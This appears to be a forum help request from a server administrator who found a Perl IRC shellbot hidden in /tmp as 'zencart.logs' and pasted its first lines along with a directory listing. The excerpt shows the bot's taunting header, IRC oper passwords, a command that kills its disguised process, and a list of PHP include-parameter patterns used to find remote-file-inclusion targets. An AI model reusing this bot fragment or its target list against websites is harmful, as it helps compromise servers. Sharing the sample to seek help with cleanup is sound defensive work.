i checked the /tmp directory and found a file of which the first few lines are:
!/usr/bin/perl
This code is based on atrix (brazil) shellbot, somebody ripped all the credits, but its obviusly a rip.
so the original author is atrix. the spread perl code was developed by sirhot (i am almost sure) he is from morocco.
Note to David Jacoby: Expect a few improvements for the next release.
The following comments are only left in the code to ridiculize this guy.
--------------------------------------------------------------
Morgan has hacked you!
Morgan Argentina, santiago del estero
oper morgan {
class clients;
from {
userhost @;
};
password “soyuncapo”; // morgan si, eres-un-capo.
oper morgan2 {
class clients;
from {
userhost @;
};
password “thegod”; //morgan si, eres el-dios.
-----------------------------------------------------------
system("kill -9 ps ax |grep /usr/sbin/apache/log |grep -v grep|awk '{print $1;}'
");
my $processo = ‘/usr/sbin/apache/log’;
my @titi = (“index.php?page=”,“main.php?page=”,“index.php?p=”,“index.php?x=”,“main.php?p=”,“index.php?inc=”,“index.php?frame=”,“main.php?x=”,“index.php?path=”,“index.php?include=”,“main.php?path=”,"index.$
“default.php?page=”,
“index.php?open=”,
“index.php?pagina=”,
“index.php?pg=”,
“index.php?pag=”,
“index.php?content=”,
“index.php?cont=”,
“index.php?c=”,
“index.php?x=”,
“index.php?cat=”,
“index.php?site=”,
“index.php?con=”,
“index.php?action=”,
“index.php?do=”,
“index2.php?x=”,
“index2.php?content=”,
“template.php?pagina=”,“index.php?load=”);
I really don’t know what i am looking at here b/c I don’t do code, but the commented section at the beginning of the file doesn’t look too friendly. Your thoughts? Also, here is a listing of the files in /tmp:
[root@host tmp]# ls -al
total 200
drwxrwxrwt 7 root root 4096 Aug 9 09:05 .
drwxr-xr-x 28 root root 4096 Aug 8 20:57 …
drwxrwxrwt 2 root root 4096 Aug 8 20:58 .font-unix
drwxrwxrwt 2 root root 4096 Aug 8 20:57 .ICE-unix
lrwxrwxrwx 1 root root 25 Nov 23 2008 mysql.sock -> /var/lib/mysql/mysql.sock
-rw------- 1 iworx iworx 87096 Aug 8 21:55 sess_003c2504a28c7ead68011927eb5d8790
-rw------- 1 iworx iworx 30304 Aug 8 22:14 sess_0323a1ad9fd8ba28c7ea11e96851031a
drwxrwx— 6 root iworx 4096 Nov 21 2007 siteworxoldimport7tG2yy
drwxrwx— 6 root iworx 4096 Nov 10 2007 siteworxoldimport8Ca32w
drwxrwx— 6 root root 4096 Aug 31 2008 siteworxoldimportyOJgyP
-rw-r–r-- 1 apache apache 17218 Aug 5 21:45 zencart.logs
-rw-r–r-- 1 apache apache 17218 Aug 5 21:45 zencart.logs.1
The excerpt above is from the file zencart.logs which is actually a script!